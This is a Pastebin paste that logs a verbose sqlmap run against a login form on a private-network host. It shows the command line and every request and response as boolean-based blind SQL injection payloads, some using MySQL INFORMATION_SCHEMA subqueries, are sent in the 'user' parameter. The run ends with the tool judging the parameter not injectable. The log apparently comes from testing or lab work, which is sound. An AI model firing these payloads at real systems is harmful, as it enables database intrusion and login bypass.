API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Mar 17th, 2017
612
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.65 KB | None | 0 0
raw download clone embed print report
  1. sqlmap -r Desktop/request.txt -p user --technique=B -v3 --proxy="http://localhost:8081" --string="failed" -v 6
  2. ___
  3. __H__
  4. ___ ___[)]_____ ___ ___ {1.1.2#stable}
  5. |_ -| . [.] | .'| . |
  6. |___|_ ["]_|_|_|__,| _|
  7. |_|V |_| http://sqlmap.org
  8.  
  9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  10.  
  11. [*] starting at 13:23:01
  12.  
  13. [13:23:01] [INFO] parsing HTTP request from 'Desktop/request.txt'
  14. [13:23:01] [DEBUG] not a valid WebScarab log data
  15. [13:23:01] [DEBUG] cleaning up configuration parameters
  16. [13:23:01] [DEBUG] setting the HTTP timeout
  17. [13:23:01] [DEBUG] setting the HTTP/SOCKS proxy for all HTTP requests
  18. [13:23:01] [DEBUG] creating HTTP requests opener object
  19. [13:23:01] [INFO] testing connection to the target URL
  20. [13:23:01] [TRAFFIC OUT] HTTP request [#1]:
  21. POST /index.php HTTP/1.1
  22. Host: 192.168.0.5
  23. Accept-language: en-US,en;q=0.5
  24. Accept-encoding: gzip, deflate
  25. Referer: http://192.168.0.5/index.php
  26. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  27. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  28. Content-length: 27
  29. Connection: close
  30.  
  31. user=abc&passwd=abc&debug=0
  32.  
  33. [13:23:01] [DEBUG] declared web page charset 'utf-8'
  34. [13:23:02] [TRAFFIC IN] HTTP response [#1] (200 OK):
  35. Content-length: 6
  36. Vary: Accept-Encoding
  37. Uri: http://192.168.0.5:80/index.php
  38. Server: Apache/2.4.18 (Ubuntu)
  39. Connection: close
  40. Date: Fri, 17 Mar 2017 11:22:59 GMT
  41. Content-type: text/html; charset=UTF-8
  42.  
  43. failed
  44. [13:23:02] [INFO] testing if the provided string is within the target URL page content
  45. [13:23:02] [TRAFFIC OUT] HTTP request [#2]:
  46. POST /index.php HTTP/1.1
  47. Host: 192.168.0.5
  48. Accept-language: en-US,en;q=0.5
  49. Accept-encoding: gzip, deflate
  50. Referer: http://192.168.0.5/index.php
  51. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  52. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  53. Content-length: 27
  54. Connection: close
  55.  
  56. user=abc&passwd=abc&debug=0
  57.  
  58. [13:23:02] [TRAFFIC IN] HTTP response [#2] (200 OK):
  59. Content-length: 6
  60. Vary: Accept-Encoding
  61. Uri: http://192.168.0.5:80/index.php
  62. Server: Apache/2.4.18 (Ubuntu)
  63. Connection: close
  64. Date: Fri, 17 Mar 2017 11:23:00 GMT
  65. Content-type: text/html; charset=UTF-8
  66.  
  67. failed
  68. [13:23:02] [PAYLOAD] abc,(),)),"'.
  69. [13:23:02] [TRAFFIC OUT] HTTP request [#3]:
  70. POST /index.php HTTP/1.1
  71. Host: 192.168.0.5
  72. Accept-language: en-US,en;q=0.5
  73. Accept-encoding: gzip, deflate
  74. Referer: http://192.168.0.5/index.php
  75. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  76. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  77. Content-length: 55
  78. Connection: close
  79.  
  80. user=abc%2C%28%29%2C%29%29%2C%22%27.&passwd=abc&debug=0
  81.  
  82. [13:23:03] [TRAFFIC IN] HTTP response [#3] (200 ):
  83. Content-length: 7
  84. Set-cookie: username=abc%2C%28%29%2C%29%29%2C%22%27.; expires=Sat, 18-Mar-2017 11:23:01 GMT; Max-Age=86400; path=/, password=abc; expires=Sat, 18-Mar-2017 11:23:01 GMT; Max-Age=86400; path=/, ha21324debug=0; expires=Sat, 18-Mar-2017 11:23:01 GMT; Max-Age=86400; path=/
  85. Uri: http://192.168.0.5:80/index.php
  86. Server: Apache/2.4.18 (Ubuntu)
  87. Connection: close
  88. Location: search.php
  89. Date: Fri, 17 Mar 2017 11:23:01 GMT
  90. Content-type: text/html; charset=UTF-8
  91.  
  92. success
  93. [13:23:03] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
  94. [13:23:03] [PAYLOAD] abc'bACOJS<'">YDycOO
  95. [13:23:03] [TRAFFIC OUT] HTTP request [#4]:
  96. POST /index.php HTTP/1.1
  97. Host: 192.168.0.5
  98. Accept-language: en-US,en;q=0.5
  99. Accept-encoding: gzip, deflate
  100. Referer: http://192.168.0.5/index.php
  101. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  102. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  103. Cookie: username=abc%2C%28%29%2C%29%29%2C%22%27.;ha21324debug=0;password=abc
  104. Content-length: 54
  105. Connection: close
  106.  
  107. user=abc%27bACOJS%3C%27%22%3EYDycOO&passwd=abc&debug=0
  108.  
  109. [13:23:03] [TRAFFIC IN] HTTP response [#4] (200 ):
  110. Content-length: 7
  111. Uri: http://192.168.0.5:80/index.php
  112. Server: Apache/2.4.18 (Ubuntu)
  113. Connection: close
  114. Location: search.php
  115. Date: Fri, 17 Mar 2017 11:23:01 GMT
  116. Content-type: text/html; charset=UTF-8
  117.  
  118. success
  119. [13:23:03] [INFO] testing for SQL injection on POST parameter 'user'
  120. [13:23:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  121. [13:23:03] [PAYLOAD] abc) AND 9411=7381 AND (4828=4828
  122. [13:23:03] [TRAFFIC OUT] HTTP request [#5]:
  123. POST /index.php HTTP/1.1
  124. Host: 192.168.0.5
  125. Accept-language: en-US,en;q=0.5
  126. Accept-encoding: gzip, deflate
  127. Referer: http://192.168.0.5/index.php
  128. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  129. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  130. Content-length: 73
  131. Connection: close
  132.  
  133. user=abc%29%20AND%209411%3D7381%20AND%20%284828%3D4828&passwd=abc&debug=0
  134.  
  135. [13:23:04] [TRAFFIC IN] HTTP response [#5] (200 OK):
  136. Content-length: 6
  137. Vary: Accept-Encoding
  138. Uri: http://192.168.0.5:80/index.php
  139. Server: Apache/2.4.18 (Ubuntu)
  140. Connection: close
  141. Date: Fri, 17 Mar 2017 11:23:02 GMT
  142. Content-type: text/html; charset=UTF-8
  143.  
  144. failed
  145. [13:23:04] [PAYLOAD] abc) AND 5219=5219 AND (8008=8008
  146. [13:23:04] [TRAFFIC OUT] HTTP request [#6]:
  147. POST /index.php HTTP/1.1
  148. Host: 192.168.0.5
  149. Accept-language: en-US,en;q=0.5
  150. Accept-encoding: gzip, deflate
  151. Referer: http://192.168.0.5/index.php
  152. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  153. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  154. Content-length: 73
  155. Connection: close
  156.  
  157. user=abc%29%20AND%205219%3D5219%20AND%20%288008%3D8008&passwd=abc&debug=0
  158.  
  159. [13:23:05] [TRAFFIC IN] HTTP response [#6] (200 OK):
  160. Content-length: 6
  161. Vary: Accept-Encoding
  162. Uri: http://192.168.0.5:80/index.php
  163. Server: Apache/2.4.18 (Ubuntu)
  164. Connection: close
  165. Date: Fri, 17 Mar 2017 11:23:03 GMT
  166. Content-type: text/html; charset=UTF-8
  167.  
  168. failed
  169. [13:23:05] [PAYLOAD] abc AND 4377=5605
  170. [13:23:05] [TRAFFIC OUT] HTTP request [#7]:
  171. POST /index.php HTTP/1.1
  172. Host: 192.168.0.5
  173. Accept-language: en-US,en;q=0.5
  174. Accept-encoding: gzip, deflate
  175. Referer: http://192.168.0.5/index.php
  176. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  177. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  178. Content-length: 47
  179. Connection: close
  180.  
  181. user=abc%20AND%204377%3D5605&passwd=abc&debug=0
  182.  
  183. [13:23:05] [TRAFFIC IN] HTTP response [#7] (200 OK):
  184. Content-length: 6
  185. Vary: Accept-Encoding
  186. Uri: http://192.168.0.5:80/index.php
  187. Server: Apache/2.4.18 (Ubuntu)
  188. Connection: close
  189. Date: Fri, 17 Mar 2017 11:23:03 GMT
  190. Content-type: text/html; charset=UTF-8
  191.  
  192. failed
  193. [13:23:05] [PAYLOAD] abc AND 5219=5219
  194. [13:23:05] [TRAFFIC OUT] HTTP request [#8]:
  195. POST /index.php HTTP/1.1
  196. Host: 192.168.0.5
  197. Accept-language: en-US,en;q=0.5
  198. Accept-encoding: gzip, deflate
  199. Referer: http://192.168.0.5/index.php
  200. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  201. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  202. Content-length: 47
  203. Connection: close
  204.  
  205. user=abc%20AND%205219%3D5219&passwd=abc&debug=0
  206.  
  207. [13:23:06] [TRAFFIC IN] HTTP response [#8] (200 OK):
  208. Content-length: 6
  209. Vary: Accept-Encoding
  210. Uri: http://192.168.0.5:80/index.php
  211. Server: Apache/2.4.18 (Ubuntu)
  212. Connection: close
  213. Date: Fri, 17 Mar 2017 11:23:04 GMT
  214. Content-type: text/html; charset=UTF-8
  215.  
  216. failed
  217. [13:23:06] [PAYLOAD] abc') AND 8466=9551 AND ('JzGw'='JzGw
  218. [13:23:06] [TRAFFIC OUT] HTTP request [#9]:
  219. POST /index.php HTTP/1.1
  220. Host: 192.168.0.5
  221. Accept-language: en-US,en;q=0.5
  222. Accept-encoding: gzip, deflate
  223. Referer: http://192.168.0.5/index.php
  224. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  225. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  226. Content-length: 85
  227. Connection: close
  228.  
  229. user=abc%27%29%20AND%208466%3D9551%20AND%20%28%27JzGw%27%3D%27JzGw&passwd=abc&debug=0
  230.  
  231. [13:23:06] [TRAFFIC IN] HTTP response [#9] (200 ):
  232. Content-length: 7
  233. Set-cookie: username=abc%27%29+AND+8466%3D9551+AND+%28%27JzGw%27%3D%27JzGw; expires=Sat, 18-Mar-2017 11:23:04 GMT; Max-Age=86400; path=/, password=abc; expires=Sat, 18-Mar-2017 11:23:04 GMT; Max-Age=86400; path=/, ha21324debug=0; expires=Sat, 18-Mar-2017 11:23:04 GMT; Max-Age=86400; path=/
  234. Uri: http://192.168.0.5:80/index.php
  235. Server: Apache/2.4.18 (Ubuntu)
  236. Connection: close
  237. Location: search.php
  238. Date: Fri, 17 Mar 2017 11:23:04 GMT
  239. Content-type: text/html; charset=UTF-8
  240.  
  241. success
  242. [13:23:06] [PAYLOAD] abc') AND 5219=5219 AND ('gMck'='gMck
  243. [13:23:06] [TRAFFIC OUT] HTTP request [#10]:
  244. POST /index.php HTTP/1.1
  245. Host: 192.168.0.5
  246. Accept-language: en-US,en;q=0.5
  247. Accept-encoding: gzip, deflate
  248. Referer: http://192.168.0.5/index.php
  249. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  250. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  251. Content-length: 85
  252. Connection: close
  253.  
  254. user=abc%27%29%20AND%205219%3D5219%20AND%20%28%27gMck%27%3D%27gMck&passwd=abc&debug=0
  255.  
  256. [13:23:07] [TRAFFIC IN] HTTP response [#10] (200 ):
  257. Content-length: 7
  258. Set-cookie: username=abc%27%29+AND+5219%3D5219+AND+%28%27gMck%27%3D%27gMck; expires=Sat, 18-Mar-2017 11:23:05 GMT; Max-Age=86400; path=/, password=abc; expires=Sat, 18-Mar-2017 11:23:05 GMT; Max-Age=86400; path=/, ha21324debug=0; expires=Sat, 18-Mar-2017 11:23:05 GMT; Max-Age=86400; path=/
  259. Uri: http://192.168.0.5:80/index.php
  260. Server: Apache/2.4.18 (Ubuntu)
  261. Connection: close
  262. Location: search.php
  263. Date: Fri, 17 Mar 2017 11:23:05 GMT
  264. Content-type: text/html; charset=UTF-8
  265.  
  266. success
  267. [13:23:07] [PAYLOAD] abc' AND 5602=1645 AND 'bRZU'='bRZU
  268. [13:23:07] [TRAFFIC OUT] HTTP request [#11]:
  269. POST /index.php HTTP/1.1
  270. Host: 192.168.0.5
  271. Accept-language: en-US,en;q=0.5
  272. Accept-encoding: gzip, deflate
  273. Referer: http://192.168.0.5/index.php
  274. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  275. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  276. Content-length: 79
  277. Connection: close
  278.  
  279. user=abc%27%20AND%205602%3D1645%20AND%20%27bRZU%27%3D%27bRZU&passwd=abc&debug=0
  280.  
  281. [13:23:07] [TRAFFIC IN] HTTP response [#11] (200 ):
  282. Content-length: 7
  283. Set-cookie: username=abc%27+AND+5602%3D1645+AND+%27bRZU%27%3D%27bRZU; expires=Sat, 18-Mar-2017 11:23:05 GMT; Max-Age=86400; path=/, password=abc; expires=Sat, 18-Mar-2017 11:23:05 GMT; Max-Age=86400; path=/, ha21324debug=0; expires=Sat, 18-Mar-2017 11:23:05 GMT; Max-Age=86400; path=/
  284. Uri: http://192.168.0.5:80/index.php
  285. Server: Apache/2.4.18 (Ubuntu)
  286. Connection: close
  287. Location: search.php
  288. Date: Fri, 17 Mar 2017 11:23:05 GMT
  289. Content-type: text/html; charset=UTF-8
  290.  
  291. success
  292. [13:23:07] [PAYLOAD] abc' AND 5219=5219 AND 'jhIc'='jhIc
  293. [13:23:07] [TRAFFIC OUT] HTTP request [#12]:
  294. POST /index.php HTTP/1.1
  295. Host: 192.168.0.5
  296. Accept-language: en-US,en;q=0.5
  297. Accept-encoding: gzip, deflate
  298. Referer: http://192.168.0.5/index.php
  299. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  300. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  301. Content-length: 79
  302. Connection: close
  303.  
  304. user=abc%27%20AND%205219%3D5219%20AND%20%27jhIc%27%3D%27jhIc&passwd=abc&debug=0
  305.  
  306. [13:23:08] [TRAFFIC IN] HTTP response [#12] (200 ):
  307. Content-length: 7
  308. Set-cookie: username=abc%27+AND+5219%3D5219+AND+%27jhIc%27%3D%27jhIc; expires=Sat, 18-Mar-2017 11:23:06 GMT; Max-Age=86400; path=/, password=abc; expires=Sat, 18-Mar-2017 11:23:06 GMT; Max-Age=86400; path=/, ha21324debug=0; expires=Sat, 18-Mar-2017 11:23:06 GMT; Max-Age=86400; path=/
  309. Uri: http://192.168.0.5:80/index.php
  310. Server: Apache/2.4.18 (Ubuntu)
  311. Connection: close
  312. Location: search.php
  313. Date: Fri, 17 Mar 2017 11:23:06 GMT
  314. Content-type: text/html; charset=UTF-8
  315.  
  316. success
  317. [13:23:08] [PAYLOAD] abc%' AND 2219=9174 AND '%'='
  318. [13:23:08] [TRAFFIC OUT] HTTP request [#13]:
  319. POST /index.php HTTP/1.1
  320. Host: 192.168.0.5
  321. Accept-language: en-US,en;q=0.5
  322. Accept-encoding: gzip, deflate
  323. Referer: http://192.168.0.5/index.php
  324. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  325. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  326. Content-length: 77
  327. Connection: close
  328.  
  329. user=abc%25%27%20AND%202219%3D9174%20AND%20%27%25%27%3D%27&passwd=abc&debug=0
  330.  
  331. [13:23:09] [TRAFFIC IN] HTTP response [#13] (200 ):
  332. Content-length: 7
  333. Set-cookie: username=abc%25%27+AND+2219%3D9174+AND+%27%25%27%3D%27; expires=Sat, 18-Mar-2017 11:23:07 GMT; Max-Age=86400; path=/, password=abc; expires=Sat, 18-Mar-2017 11:23:07 GMT; Max-Age=86400; path=/, ha21324debug=0; expires=Sat, 18-Mar-2017 11:23:07 GMT; Max-Age=86400; path=/
  334. Uri: http://192.168.0.5:80/index.php
  335. Server: Apache/2.4.18 (Ubuntu)
  336. Connection: close
  337. Location: search.php
  338. Date: Fri, 17 Mar 2017 11:23:07 GMT
  339. Content-type: text/html; charset=UTF-8
  340.  
  341. success
  342. [13:23:09] [PAYLOAD] abc%' AND 5219=5219 AND '%'='
  343. [13:23:09] [TRAFFIC OUT] HTTP request [#14]:
  344. POST /index.php HTTP/1.1
  345. Host: 192.168.0.5
  346. Accept-language: en-US,en;q=0.5
  347. Accept-encoding: gzip, deflate
  348. Referer: http://192.168.0.5/index.php
  349. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  350. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  351. Content-length: 77
  352. Connection: close
  353.  
  354. user=abc%25%27%20AND%205219%3D5219%20AND%20%27%25%27%3D%27&passwd=abc&debug=0
  355.  
  356. [13:23:09] [TRAFFIC IN] HTTP response [#14] (200 ):
  357. Content-length: 7
  358. Set-cookie: username=abc%25%27+AND+5219%3D5219+AND+%27%25%27%3D%27; expires=Sat, 18-Mar-2017 11:23:07 GMT; Max-Age=86400; path=/, password=abc; expires=Sat, 18-Mar-2017 11:23:07 GMT; Max-Age=86400; path=/, ha21324debug=0; expires=Sat, 18-Mar-2017 11:23:07 GMT; Max-Age=86400; path=/
  359. Uri: http://192.168.0.5:80/index.php
  360. Server: Apache/2.4.18 (Ubuntu)
  361. Connection: close
  362. Location: search.php
  363. Date: Fri, 17 Mar 2017 11:23:07 GMT
  364. Content-type: text/html; charset=UTF-8
  365.  
  366. success
  367. [13:23:09] [PAYLOAD] abc AND 8660=3998-- JPJo
  368. [13:23:09] [TRAFFIC OUT] HTTP request [#15]:
  369. POST /index.php HTTP/1.1
  370. Host: 192.168.0.5
  371. Accept-language: en-US,en;q=0.5
  372. Accept-encoding: gzip, deflate
  373. Referer: http://192.168.0.5/index.php
  374. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  375. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  376. Content-length: 56
  377. Connection: close
  378.  
  379. user=abc%20AND%208660%3D3998--%20JPJo&passwd=abc&debug=0
  380.  
  381. [13:23:10] [TRAFFIC IN] HTTP response [#15] (200 OK):
  382. Content-length: 6
  383. Vary: Accept-Encoding
  384. Uri: http://192.168.0.5:80/index.php
  385. Server: Apache/2.4.18 (Ubuntu)
  386. Connection: close
  387. Date: Fri, 17 Mar 2017 11:23:08 GMT
  388. Content-type: text/html; charset=UTF-8
  389.  
  390. failed
  391. [13:23:10] [PAYLOAD] abc AND 5219=5219-- lpPm
  392. [13:23:10] [TRAFFIC OUT] HTTP request [#16]:
  393. POST /index.php HTTP/1.1
  394. Host: 192.168.0.5
  395. Accept-language: en-US,en;q=0.5
  396. Accept-encoding: gzip, deflate
  397. Referer: http://192.168.0.5/index.php
  398. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  399. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  400. Content-length: 56
  401. Connection: close
  402.  
  403. user=abc%20AND%205219%3D5219--%20lpPm&passwd=abc&debug=0
  404.  
  405. [13:23:10] [TRAFFIC IN] HTTP response [#16] (200 OK):
  406. Content-length: 6
  407. Vary: Accept-Encoding
  408. Uri: http://192.168.0.5:80/index.php
  409. Server: Apache/2.4.18 (Ubuntu)
  410. Connection: close
  411. Date: Fri, 17 Mar 2017 11:23:08 GMT
  412. Content-type: text/html; charset=UTF-8
  413.  
  414. failed
  415. [13:23:10] [DEBUG] skipping some tests
  416. [13:23:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
  417. [13:23:10] [PAYLOAD] (SELECT (CASE WHEN (5261=7717) THEN 5261 ELSE 5261*(SELECT 5261 FROM INFORMATION_SCHEMA.PLUGINS) END))
  418. [13:23:10] [TRAFFIC OUT] HTTP request [#17]:
  419. POST /index.php HTTP/1.1
  420. Host: 192.168.0.5
  421. Accept-language: en-US,en;q=0.5
  422. Accept-encoding: gzip, deflate
  423. Referer: http://192.168.0.5/index.php
  424. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  425. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  426. Content-length: 168
  427. Connection: close
  428.  
  429. user=%28SELECT%20%28CASE%20WHEN%20%285261%3D7717%29%20THEN%205261%20ELSE%205261%2A%28SELECT%205261%20FROM%20INFORMATION_SCHEMA.PLUGINS%29%20END%29%29&passwd=abc&debug=0
  430.  
  431. [13:23:11] [TRAFFIC IN] HTTP response [#17] (200 OK):
  432. Content-length: 6
  433. Vary: Accept-Encoding
  434. Uri: http://192.168.0.5:80/index.php
  435. Server: Apache/2.4.18 (Ubuntu)
  436. Connection: close
  437. Date: Fri, 17 Mar 2017 11:23:09 GMT
  438. Content-type: text/html; charset=UTF-8
  439.  
  440. failed
  441. [13:23:11] [PAYLOAD] (SELECT (CASE WHEN (4640=4640) THEN 4640 ELSE 4640*(SELECT 4640 FROM INFORMATION_SCHEMA.PLUGINS) END))
  442. [13:23:11] [TRAFFIC OUT] HTTP request [#18]:
  443. POST /index.php HTTP/1.1
  444. Host: 192.168.0.5
  445. Accept-language: en-US,en;q=0.5
  446. Accept-encoding: gzip, deflate
  447. Referer: http://192.168.0.5/index.php
  448. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  449. User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
  450. Content-length: 168
  451. Connection: close
  452.  
  453. user=%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%204640%20ELSE%204640%2A%28SELECT%204640%20FROM%20INFORMATION_SCHEMA.PLUGINS%29%20END%29%29&passwd=abc&debug=0
  454.  
  455. [13:23:12] [TRAFFIC IN] HTTP response [#18] (200 OK):
  456. Content-length: 6
  457. Vary: Accept-Encoding
  458. Uri: http://192.168.0.5:80/index.php
  459. Server: Apache/2.4.18 (Ubuntu)
  460. Connection: close
  461. Date: Fri, 17 Mar 2017 11:23:10 GMT
  462. Content-type: text/html; charset=UTF-8
  463.  
  464. failed
  465. [13:23:12] [DEBUG] skipping some tests
  466. [13:23:12] [WARNING] POST parameter 'user' does not seem to be injectable
  467. [13:23:12] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Rerun without providing the option '--technique'. Also, you can try to rerun by providing a valid value for option '--string' as perhaps the string you have chosen does not match exclusively True responses. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
  468.  
  469. [*] shutting down at 13:23:12
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!